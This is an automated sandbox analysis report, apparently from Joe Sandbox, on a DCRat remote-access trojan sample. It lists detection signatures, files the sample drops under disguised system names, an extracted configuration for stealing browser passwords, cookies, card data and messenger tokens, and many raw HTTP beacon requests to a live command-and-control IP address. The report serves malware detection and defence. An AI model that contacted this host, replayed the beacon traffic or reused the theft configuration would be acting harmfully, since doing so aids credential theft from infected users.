Windows Analysis Report
XPC5PMKegV.exe

Overview

General Information

Sample name: XPC5PMKegV.exe
renamed because original name is a hash value
Original sample name: 20cf7f39edef3db30f388829c5a3f05c.exe
Analysis ID: 1500508
MD5: 20cf7f39edef3db30f388829c5a3f05c
SHA1: 009eb186382733844b2d8c5202d0da9ac1f8dfb0
SHA256: 2554c3bd1b50fccf6833eb50179c877a95fce8135031204e8e678c4d8c5db89f
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: XPC5PMKegV.exe Avira: detected
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r Avira URL Cloud: Label: malware
Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"p\":\"~\",\"B\":\"$\",\"3\":\"*\",\"J\":\"#\",\"c\":\",\",\"i\":\"_\",\"m\":\"!\",\"U\":\"^\",\"V\":\" \",\"b\":\"(\",\"2\":\"<\",\"F\":\">\",\"I\":\".\",\"s\":\"-\",\"M\":\"|\",\"C\":\";\",\"R\":\")\",\"a\":\"@\",\"1\":\"&\",\"6\":\"`\",\"G\":\"%\"}", "PCRT": "{\"v\":\"%\",\"0\":\"!\",\"Q\":\",\",\"Y\":\"|\",\"U\":\"^\",\"F\":\"&\",\"d\":\"`\",\"R\":\"*\",\"K\":\"$\",\"V\":\"(\",\"Z\":\"~\",\"x\":\" \",\"3\":\"-\",\"B\":\";\",\"G\":\">\",\"I\":\"<\",\"X\":\"@\",\"W\":\")\",\"t\":\"#\",\"N\":\".\",\"4\":\"_\"}", "TAG": "m", "MUTEX": "DCR_MUTEX-WVn4oNZYFAP9yGpaqtNX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Microsoft.NET\System.exe ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe ReversingLabs: Detection: 78%
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe ReversingLabs: Detection: 78%
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe ReversingLabs: Detection: 78%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe ReversingLabs: Detection: 78%
Source: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe ReversingLabs: Detection: 78%
Source: XPC5PMKegV.exe ReversingLabs: Detection: 78%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Joe Sandbox ML: detected
Source: XPC5PMKegV.exe Joe Sandbox ML: detected
Source: XPC5PMKegV.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382 Jump to behavior
Source: XPC5PMKegV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51888 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49716 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49725 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49721 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51868 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51883 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49726 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49722 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51865 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49727 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51886 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51862 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51871 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51877 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51887 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49717 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51870 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49724 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51858 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51863 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51890 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51859 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49718 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49719 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51860 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51861 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51864 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51881 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51875 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51878 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51892 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51867 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49723 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49728 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51891 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51884 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51873 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51869 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51874 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51876 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51889 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51882 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51872 -> 92.63.98.227:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51885 -> 92.63.98.227:80
Source: Joe Sandbox View ASN Name: THEFIRST-ASRU THEFIRST-ASRU
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
